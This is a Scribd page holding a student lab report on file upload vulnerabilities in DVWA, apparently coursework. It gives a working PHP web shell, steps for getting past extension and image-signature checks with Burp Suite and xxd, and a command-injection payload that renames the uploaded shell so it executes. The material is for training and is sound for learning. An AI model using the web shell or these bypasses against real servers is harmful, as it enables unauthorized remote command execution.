Scribd
Upload
2K views6 pages

File Upload Vulnerability in DVWA: Lab Experiment - 8

The document describes three experiments on file upload vulnerabilities in DVWA (Damn Vulnerable Web Application). In the low vulnerability setting, any file type can be uploaded, allowing a PHP web shell to be uploaded and executed. In the medium setting, only images can be uploaded, but modifying the file extension in Burp Suite allows uploading an executable file. In the high setting, file signatures are modified in a hexadecimal editor to trick the server into thinking an executable file is an image file, allowing it to be uploaded and later renamed to be executable.

Uploaded by

viwajd
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
2K views6 pages

File Upload Vulnerability in DVWA: Lab Experiment - 8

The document describes three experiments on file upload vulnerabilities in DVWA (Damn Vulnerable Web Application). In the low vulnerability setting, any file type can be uploaded, allowing a PHP web shell to be uploaded and executed. In the medium setting, only images can be uploaded, but modifying the file extension in Burp Suite allows uploading an executable file. In the high setting, file signatures are modified in a hexadecimal editor to trick the server into thinking an executable file is an image file, allowing it to be uploaded and later renamed to be executable.

Uploaded by

viwajd
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 6

Name : Vishal Kumar Date :15/10/2020

Sap id : 500076544
Roll No. : R134219106
Batch : B4 (CSF SEM III )
Subject : IT Applications & Data Security Lab

Lab Experiment – 8
File Upload Vulnerability in DVWA

LOW: (No restrictions. Any file types are allowed)


Open any editor and create a file. Write following code for creating a web shell.

<?php
$cmd=$_GET['cmd'];
system($cmd);
?>

Now save the file as ‘file1.php’


Upload the file and it will be uploaded.
To check whether the shell is running, go to “127.0.0.1/DVWA/hackable/uploads/file1.php?
cmd=pwd”, command will be executed.

MEDIUM: (Only image file types i.e. JPEG, PNG are allowed)
Write the same web shell but save it by name ‘file2.php.png’

Select the file, but before uploading it, open Burp Suite and turn the interceptor on.
Then upload the file the request will be intercepted in Burp.
In Burp interceptor, change the extension again by editing the file name to ‘file2.php’.
Forward the request. File will be uploaded.
Go to “127.0.0.1/DVWA/hackable/uploads/file1.php?cmd=pwd” and check.

HIGH: Uses getimagesize() function, so the file signature should be of image only.
We will edit file signatures in Hexadecimal editor
Write the same web shell and save it as file3.png. Use xxd editor to edit file signatures.
# apt-get install xxd
# apt-get update

# xxd file3.png hexdump


# gedit hexdump

Now go to link (https://www.garykessler.net/library/file_sigs.html)


Copy file signatures for PNG file and paste it at the beginning of the Hex code of png file in geditor.

Convert the hex code back to image file


# xxd -r hexdump file4.png
Now upload the file. It will be uploaded but it is an image file and not an executable. Now to rename
it, use command injection vulnerability. Go to command injection and insert following command.

127.0.0.1|mv ../../hackable/uploads/file4.png ../../hackable/uploads/file4.php


Now the uploaded file should be an executable one

You might also like